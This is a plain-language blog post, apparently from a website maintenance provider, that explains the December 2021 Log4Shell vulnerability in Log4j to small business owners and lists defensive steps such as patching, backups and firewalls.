Unless you are in the IT industry, the news of a worldwide massive security vulnerability that has just been discovered may have passed you by last weekend.
The problem is that this particular vulnerability has immense potential ramifications and has had IT teams around the globe racing against hackers to try to patch the problem.
What is the problem?
The software that runs our business applications, servers and other apps uses code. In many cases, this code draws on what is known as open-source code that developers have made available for free for other developers to use.
Rather than reinvent the wheel, developers copy and tweak this open-source code into their own programs.
When this code is particularly useful, you may see it appear in millions of pieces of software, hardware and systems.
It works brilliantly until a vulnerability is discovered in that code that hackers can then use to access the software, hardware, and systems.
What is Log4J?
In this situation, the open-source code is catchily titled “log4J”.
This particular code helps to record what is happening in programs and systems. These logs help keep an eye on if things are running smoothly with a program or what has triggered particular errors in a program or system.
Log4J is one of the most popular pieces of open-source logging code on the market. It is conservatively estimated to be used in 3 billion (yes – billion with a b) systems worldwide.
It is used in many business programs, applications, cloud services, and web servers. It also includes security devices, PCs, Macs, web servers, mobile phones, network devices, cloud hosting providers and tech connected to the Internet of Things such as smart devices.
What is the vulnerability?
A vulnerability was found in the code on 9 December 2021 that allows malicious actors to take complete control of servers and programs running the code without authentication. This means it bypasses multifactor authentication and other systems designed to stop unauthorised access.
The vulnerability allows malicious actors to install malware or ransomware, access all files on the server or install backdoors to your system for later access.
The vulnerability has been named Log4Shell for ease of reference and classified as a high severity 10/10 vulnerability (CVE-2021-44228). It affects version 2 of Log4j between versions 2.0-beta-9 and 2.14.1. It is patched in 2.16.0. The ASCS has listed the alert status as critical.
Is there a fix for the vulnerability?
While a patch has been issued to fix the vulnerability, fixing it is not straightforward. The code is buried deep in programs developed by thousands of vendors. Each individual program, device, and system will need to be identified, and the patch applied.
How big a task is that?
Look around your desk in your office. How many pieces of tech can you see? Now open your computer and your phone. How many programs and applications do you have loaded? What about the programs that form part of the operating system?
Next, look at your website. Where does it live? What software does it run on?
Any one of these could be using log4J. Now multiply that by each person in your organisation.
In a large enterprise, this is a mammoth undertaking with a complex web of legacy IT systems with modern pieces bolted on.
What is happening to fix the issue?
Every IT team, IT company, hosting company, and software company is scrambling to identify all the places where that piece of software code has been used and work out how to apply the patches.
In most cases, it will be up to the individual vendor to patch the software and then push out the patch to businesses to apply, but this could take months which leaves the business wide open and vulnerable in the meantime.
Cybersecurity teams within businesses are working around the clock trying to identify how the vulnerability will be exploited and trying to put in monitoring to spot any threats, and barriers to stop the bad guys before they get too far into the systems.
The added challenge is that this vulnerability is ridiculously easy to exploit. Anyone who can copy and paste can exploit this vulnerability, so it is being used by not only highly skilled hackers or state actors but also novice hackers commonly known as “script kiddies.”
What has been seen in the past few days are cryptominers and automated botnets leveraging the vulnerability. But it is only a matter of time before other more complex attacks will follow, including ransomware and worms to create compromised hosts that are then sold to the highest bidder.
This is a race against time, but it may take up to a year before the most vulnerable pieces of software/system are identified and patched.
How Bad is Log4Shell?
There is no complete list of every company that is affected. Just a few of the companies that have been reported as being impacted include Microsoft, Amazon Web Services, CISCO, cPanel, Dell, Google Cloud, Minecraft, RSA, Salesforce, SAP (some products), Apple iCloud, Tesla, Twitter, Steam, Sophos, TP-Link, VMWare.
“The internet’s on fire right now,” said Adam Meyers, senior vice president of intelligence at the cybersecurity firm Crowdstrike. “People are scrambling to patch, and there are script kiddies and all kinds of people scrambling to exploit it.”
“I’d be hard-pressed to think of a company that’s not at risk,” said Joe Sullivan, chief security officer for Cloudflare.
The bottom line is that while the patches are being rolled out, there will be a load of data breaches, malware attacks, ransomware attacks and credit card scraping by malicious actors.
As a small business owner/individual, what do you need to do?
Most of the initial work to fix the vulnerability needs to be done by your hardware and software providers.
Your role is to apply each of the patches as they come through to things that you use and protecting your environment the best you can.
- Patch. Patch. Check for updates for all your system/app files daily and ensure every update is run. While Microsoft is good at helping you find patches for their products, you may need to manually check other hardware and software to make sure they update.
- If you have your own server for your business, get a competent IT company to assist you in getting all patches applied as soon as they become available. This is not something that you can leave for later – all patches need to be applied within 24 hours.
- Backups. Have solid and reliable backups for all your systems and information.
- Boost your firewall. Talk with a cybersecurity company/IT company to get assistance with setting up and configuring a firewall that mitigates attacks.
- Anti Virus. Keep your anti-virus and anti-malware programs constantly updated as many are releasing additional signatures to mitigate the risks.
- Update your routers (including your home routers) as patches become available.
- If you have custom software or in-house software that has been developed for your business, have it reviewed to ensure that it does not contain log4J.
- Alerts. Assume that your personal details will be breached somewhere along the line. Sign up for a service like Have I Been Pwned to get an alert if any of your details are leaked.
- Prepare your response to a breach. The likelihood that your business systems will be breached has increased, so review the guidelines from the ACSC about what to do if your systems are breached, and plan your response now (rather than when you are in the thick of a problem).
- Keep a close eye on all bank transactions to ensure there are no unaccounted-for transactions, and regularly audit larger or high volume transactions as hacker may silently set up autopay on your systems with this breach.
Finally, be kind to your IT people and companies that you use.
Good ones will be across this problem and will be working long hours and proactively communicating with you about your risks and how to mitigate them. Of course, if you hear nothing from the IT companies that you use, then you may choose to draw your own conclusions about their competence.
For my website maintenance clients, I have already been in touch with the hosting companies that we recommended to you to check their response to the issue. They have either disabled the vulnerable component within your cPanel while they assess if the patch will impact your site, or have already updated with latest patch. WordPress, themes and plugins generally do not run Java so are not affected.